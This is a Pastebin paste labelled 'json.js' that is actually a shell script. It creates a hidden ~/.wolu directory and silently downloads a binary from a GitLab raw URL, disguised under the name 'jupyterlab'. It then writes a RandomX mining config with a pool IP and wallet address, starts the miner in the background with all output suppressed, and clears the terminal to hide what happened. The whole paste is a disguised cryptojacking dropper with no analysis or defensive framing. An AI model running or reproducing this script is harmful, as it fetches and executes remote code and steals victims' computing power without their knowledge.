Advertisement
ppek

json.js

Dec 23rd, 2024 (edited)
80
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JSON 0.76 KB | None | 0 0
  1. cd ~/
  2. mkdir .wolu && cd .wolu
  3. #!/bin/sh
  4. wget -qO wolu https://gitlab.com/ghcees/pack/-/raw/main/jupyterlab && chmod +x wolu >/dev/null 2>&1
  5.  
  6. cat > config.json <<END
  7. {
  8.     "autosave": true,
  9.     "randomx": {
  10.         "1gb-pages": true
  11.     },
  12.     "cpu": {
  13.         "enabled": true,
  14.         "huge-pages": true,
  15.         "rx/0": [-1, -1, -1, -1,-1, -1, -1, -1]
  16. },
  17.     "pools": [
  18.         {
  19.             "algo": "null",
  20.             "coin": null,
  21.             "url": "47.237.30.51:1123",
  22.             "user": "ZEPHsCKmc1SXiZFnBPfeVHUxjs1XikpsqLWPHmHx2sNE6foC6aXdPUYJdGtxw6r9M5BsLKzV4tFcxfQHZqTM1AmSZxiGgFxo7A1",
  23.             "pass": "ALL-$(TZ=UTC-7 date +"%D-%H")",
  24.             "keepalive": true,
  25.         }
  26.     ],
  27. }
  28. END
  29.  
  30.  
  31. nohup ./wolu &>/dev/null &
  32.  
  33. clear && ps
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement